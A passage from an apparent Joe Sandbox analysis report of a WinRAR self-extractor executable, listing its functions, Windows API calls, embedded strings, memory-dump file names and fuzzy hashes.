Instruction ID: f9829112d72294facb5268b90c3dbd7029e0f35defeb4af6884da664e661fbef
Opcode Fuzzy Hash: 8d25fd63a65332c14761dec60f90f7e536d3e8df42b0a807d38d0572dc703df0
Instruction Fuzzy Hash: 26E21122B0868286FB18EB75DA502FDA7A1FF69784F802135CA5E47796DF7CE055C320

Function 00007FF70E7940BC Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF70E79410B
FindFirstFileW.KERNELBASE ref: 00007FF70E79415E
GetLastError.KERNEL32 ref: 00007FF70E7941AF
FindNextFileW.KERNEL32 ref: 00007FF70E7941D7
GetLastError.KERNEL32 ref: 00007FF70E7941E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79430F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E794315

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
Instruction ID: 43fa373961222c6060081622f4239834efd13ae0648361d65906965636cb812b
Opcode Fuzzy Hash: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
Instruction Fuzzy Hash: 0061A872A0864681EA14EB24EC8427DA361FF997B4F906331EABD436D9EF3CD585C710

Function 00007FF70E785E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF70E7859B2, 00007FF70E78675B

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
Instruction ID: b3ac78d62c64d5c69be70aa59e97b93c344d56ac78c409ef3833a11586aed1ff
Opcode Fuzzy Hash: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
Instruction Fuzzy Hash: 7B42E522B0868166FB18EBB4CA512FDB7A1EF69344F802136DB5E536D6DF38E519C310

Function 00007FF70E7A1F20 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
Instruction ID: dbec016305d1ce3fead797688c69336a375581afc471d539bb330daa82024095
Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
Instruction Fuzzy Hash: 89E10622A092C28AEB74EF28E84427DB790FF88748F886135DB9E47745EF7DE5418714

Function 00007FF70E7A3484 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d062b81ff85e99c027c17d7330e51e531146c9be40311c84632bfa3d7957820
Instruction ID: 1197224c1462f9b7e80c20ee0ec2586ed490a347813515e188de19b795cf862d
Opcode Fuzzy Hash: 1d062b81ff85e99c027c17d7330e51e531146c9be40311c84632bfa3d7957820
Instruction Fuzzy Hash: CDB1D1A2B056C9A2DE58EE65D9087EDA391BB89FC4F889032DE0D0B744DF3CE155C310

Function 00007FF70E794928 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID:
API String ID: 3340455307-0
Opcode ID: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
Instruction ID: 5547a1df14f19aa384bd97cc837487581f70059188d05340641dd2cb574f17a6
Opcode Fuzzy Hash: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
Instruction Fuzzy Hash: 02411732B1566686FA64EE21ED9076AA252FFC8784F846030DE5D07794EF3CE4438314

Function 00007FF70E79DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E018
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E030
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E05D
CreateFileW.KERNEL32 ref: 00007FF70E79E3F0
SetFilePointer.KERNEL32 ref: 00007FF70E79E40E
ReadFile.KERNEL32 ref: 00007FF70E79E436

Part of subcall function 00007FF70E79DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF70E79DDDF

CompareStringW.KERNELBASE ref: 00007FF70E79E559
CloseHandle.KERNEL32 ref: 00007FF70E79E4F3

Part of subcall function 00007FF70E781FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E781FFB

Part of subcall function 00007FF70E7951A4: GetVersionExW.KERNEL32 ref: 00007FF70E7951D5

Part of subcall function 00007FF70E79DFD0: LoadLibraryExW.KERNELBASE ref: 00007FF70E79DEFF
Part of subcall function 00007FF70E79DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79DFB5
Part of subcall function 00007FF70E79DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79DFBB
Part of subcall function 00007FF70E79DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79DFC1
Part of subcall function 00007FF70E79DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79DFC7

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E74B
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E755
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E75D
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E780
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E799
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E7A4
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF70E79E7AA
ExitProcess.KERNEL32 ref: 00007FF70E79E7BB

Strings

uxtheme.dll, xrefs: 00007FF70E79E66D
RpcRtRemote.dll, xrefs: 00007FF70E79E363
crypt32.dll, xrefs: 00007FF70E79E187
ntshrui.dll, xrefs: 00007FF70E79E12B
apphelp.dll, xrefs: 00007FF70E79E14F
wintrust.dll, xrefs: 00007FF70E79E1B1
ws2_32.dll, xrefs: 00007FF70E79E0FF
msasn1.dll, xrefs: 00007FF70E79E195
SSPICLI.DLL, xrefs: 00007FF70E79E09C
netapi32.dll, xrefs: 00007FF70E79E16B
atl.dll, xrefs: 00007FF70E79E136
rsaenh.dll, xrefs: 00007FF70E79E0A7
oleaccrc.dll, xrefs: 00007FF70E79E1E9
XmlLite.dll, xrefs: 00007FF70E79E339
ieframe.dll, xrefs: 00007FF70E79E120
linkinfo.dll, xrefs: 00007FF70E79E347
iphlpapi.DLL, xrefs: 00007FF70E79E267
cabinet.dll, xrefs: 00007FF70E79E1DB
samlib.dll, xrefs: 00007FF70E79E2D7
secur32.dll, xrefs: 00007FF70E79E1CD
profapi.dll, xrefs: 00007FF70E79E205
cryptui.dll, xrefs: 00007FF70E79E1A3
dsrole.dll, xrefs: 00007FF70E79E37F
lpk.dll, xrefs: 00007FF70E79E0D3
peerdist.dll, xrefs: 00007FF70E79E38D
sfc_os.dll, xrefs: 00007FF70E79E091
mlang.dll, xrefs: 00007FF70E79E2BB
cscapi.dll, xrefs: 00007FF70E79E22F
wkscli.dll, xrefs: 00007FF70E79E2E5
devrtl.dll, xrefs: 00007FF70E79E29F
setupapi.dll, xrefs: 00007FF70E79E141
rasadhlp.dll, xrefs: 00007FF70E79E30F
usp10.dll, xrefs: 00007FF70E79E0DE
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF70E79E73B
dhcpcsvc6.dll, xrefs: 00007FF70E79E31D
dfscli.dll, xrefs: 00007FF70E79E2F3
SetDefaultDllDirectories, xrefs: 00007FF70E79E053
mpr.dll, xrefs: 00007FF70E79E291
shdocvw.dll, xrefs: 00007FF70E79E179
WindowsCodecs.dll, xrefs: 00007FF70E79E213
ws2help.dll, xrefs: 00007FF70E79E10A
samcli.dll, xrefs: 00007FF70E79E2C9
comres.dll, xrefs: 00007FF70E79E0F4
shell32.dll, xrefs: 00007FF70E79E1BF
netutils.dll, xrefs: 00007FF70E79E283
clbcatq.dll, xrefs: 00007FF70E79E0E9
WINNSI.DLL, xrefs: 00007FF70E79E275
DXGIDebug.dll, xrefs: 00007FF70E79E086, 00007FF70E79E5B6
dwmapi.dll, xrefs: 00007FF70E79E0BD, 00007FF70E79E661
aclui.dll, xrefs: 00007FF70E79E371
dhcpcsvc.dll, xrefs: 00007FF70E79E32B
version.dll, xrefs: 00007FF70E79E07B
imageres.dll, xrefs: 00007FF70E79E24B
cryptsp.dll, xrefs: 00007FF70E79E355
slc.dll, xrefs: 00007FF70E79E23D
dnsapi.DLL, xrefs: 00007FF70E79E259
SetDllDirectoryW, xrefs: 00007FF70E79E026
propsys.dll, xrefs: 00007FF70E79E2AD
srvcli.dll, xrefs: 00007FF70E79E221
kernel32, xrefs: 00007FF70E79E011
browcli.dll, xrefs: 00007FF70E79E301
cryptbase.dll, xrefs: 00007FF70E79E0C8
ntmarta.dll, xrefs: 00007FF70E79E1F7
psapi.dll, xrefs: 00007FF70E79E115
UXTheme.dll, xrefs: 00007FF70E79E0B2
userenv.dll, xrefs: 00007FF70E79E15D

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
Instruction ID: ce443c54b3842031f0faa77937784247d0dc12564ca345c8bf492c477793093f
Opcode Fuzzy Hash: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
Instruction Fuzzy Hash: 3D320F31A09B8295E751AF64EC401E9B3A8FF88364FD0223ADA4D177A5EF3CD695C350

Function 00007FF70E7998DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E798E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E798F8D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70E799F75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79A42F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E79A435

Part of subcall function 00007FF70E7A0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF70E7A0B44), ref: 00007FF70E7A0BE9

Strings

DIRECTION, xrefs: 00007FF70E799DE5
RTL, xrefs: 00007FF70E799F2E
MENU, xrefs: 00007FF70E799DD9
$%s:, xrefs: 00007FF70E799F50
,, xrefs: 00007FF70E799FAA
, xrefs: 00007FF70E799DF9
STRINGS, xrefs: 00007FF70E799DC1
DIALOG, xrefs: 00007FF70E799DCD
*messages***, xrefs: 00007FF70E799BC6
*messages***, xrefs: 00007FF70E799C04
@%s:, xrefs: 00007FF70E799F57

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
Instruction ID: 6857331b0049a8a309558f2b41e6fae38ee42d2a015e218b73ca21f1f0c60197
Opcode Fuzzy Hash: bfd9826349ba550d8c78124b786cfa0a6bd1f1a0566aa61a924ec97ec8e1947b
Instruction Fuzzy Hash: E062BF22A19A8295FB10EB34DC442BDA365FF98784FC0A136DA4D476D5EF3CE585C360

Function 00007FF70E7B1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF70E7B1558: DloadProtectSection.DELAYIMP ref: 00007FF70E7B15C9

RaiseException.KERNEL32 ref: 00007FF70E7B19A7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF70E7B1993

Part of subcall function 00007FF70E7B1868: DloadProtectSection.DELAYIMP ref: 00007FF70E7B18C7

LoadLibraryExA.KERNELBASE ref: 00007FF70E7B1A46
GetLastError.KERNEL32 ref: 00007FF70E7B1A54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF70E7B1A86
RaiseException.KERNEL32 ref: 00007FF70E7B1A9A

Strings

H, xrefs: 00007FF70E7B1974

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction ID: 2297cea8a06a13cd893e56067d868f464c5e58362eed2c9aa17890800af04ea3
Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction Fuzzy Hash: DA916B22A06B518AEB14EF61EC502ACB3B5FF1CB94B856439DE4D17744EF38E485C320

Function 00007FF70E7AF4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF70E7AF747
ShowWindow.USER32 ref: 00007FF70E7AF786
GetExitCodeProcess.KERNEL32 ref: 00007FF70E7AF7BD
CloseHandle.KERNEL32 ref: 00007FF70E7AF7E7
ShowWindow.USER32 ref: 00007FF70E7AF83F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AF8FB

Strings

p, xrefs: 00007FF70E7AF529
.inf, xrefs: 00007FF70E7AF675
.exe, xrefs: 00007FF70E7AF7F2
Install, xrefs: 00007FF70E7AF684

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 1054546013-3607691742
Opcode ID: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
Instruction ID: d3558c9626c71faa054e38144a44d15233f50f781adcf8273ec4afbe00eb54c0
Opcode Fuzzy Hash: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
Instruction Fuzzy Hash: 31C17C22F09A0295FB18EB25DD44279B3B1AFCDB84F886036DA4D477A5DF3CE4958320

Function 00007FF70E7AF0A4 Relevance: 16.6, APIs: 11, Instructions: 102
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF70E7AAE1C: PeekMessageW.USER32 ref: 00007FF70E7AAE32
Part of subcall function 00007FF70E7AAE1C: GetMessageW.USER32 ref: 00007FF70E7AAE49
Part of subcall function 00007FF70E7AAE1C: IsDialogMessageW.USER32 ref: 00007FF70E7AAE60
Part of subcall function 00007FF70E7AAE1C: TranslateMessage.USER32 ref: 00007FF70E7AAE6F
Part of subcall function 00007FF70E7AAE1C: DispatchMessageW.USER32 ref: 00007FF70E7AAE7A

GetDlgItem.USER32 ref: 00007FF70E7AF0E3
ShowWindow.USER32 ref: 00007FF70E7AF109
SendMessageW.USER32 ref: 00007FF70E7AF11E
SendMessageW.USER32 ref: 00007FF70E7AF136
SendMessageW.USER32 ref: 00007FF70E7AF157
SendMessageW.USER32 ref: 00007FF70E7AF173
SendMessageW.USER32 ref: 00007FF70E7AF1B6
SendMessageW.USER32 ref: 00007FF70E7AF1D4
SendMessageW.USER32 ref: 00007FF70E7AF1E8
SendMessageW.USER32 ref: 00007FF70E7AF212
SendMessageW.USER32 ref: 00007FF70E7AF22A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 3569833718-0
Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
Instruction ID: 76d4db80d9274e5be0fb76b05f9aeda0b9aee45992e5cdd8eb53cb57fdf8c77b
Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
Instruction Fuzzy Hash: 7C419A21B14A4286F714AF61EC10BAE7360EF8DB9CF842535DD0A07B95CF3DE4498764

Function 00007FF70E7AA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF70E78129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70E781396

Part of subcall function 00007FF70E7AA834: RegOpenKeyExW.ADVAPI32 ref: 00007FF70E7AA877

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AA72F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AA735
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AA73B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AA741
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AA747
EndDialog.USER32 ref: 00007FF70E7AA7BA

Strings

Software\WinRAR SFX, xrefs: 00007FF70E7AA52B, 00007FF70E7AA53A
GETPASSWORD1, xrefs: 00007FF70E7AA773

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialogOpen
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 2300675366-1315819833
Opcode ID: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
Instruction ID: 1b9ff76800a125e011e99cc161af0ca86dabc2fb96d5e6feb01adb76ee821309
Opcode Fuzzy Hash: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
Instruction Fuzzy Hash: 7CB1C162F1978285FB00EB64D8443BDA372AF89794F846236DA5C27AD9EF3CE445C310

Function 00007FF70E78EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F542
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F548
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F560
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F56C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F572

Memory Dump Source

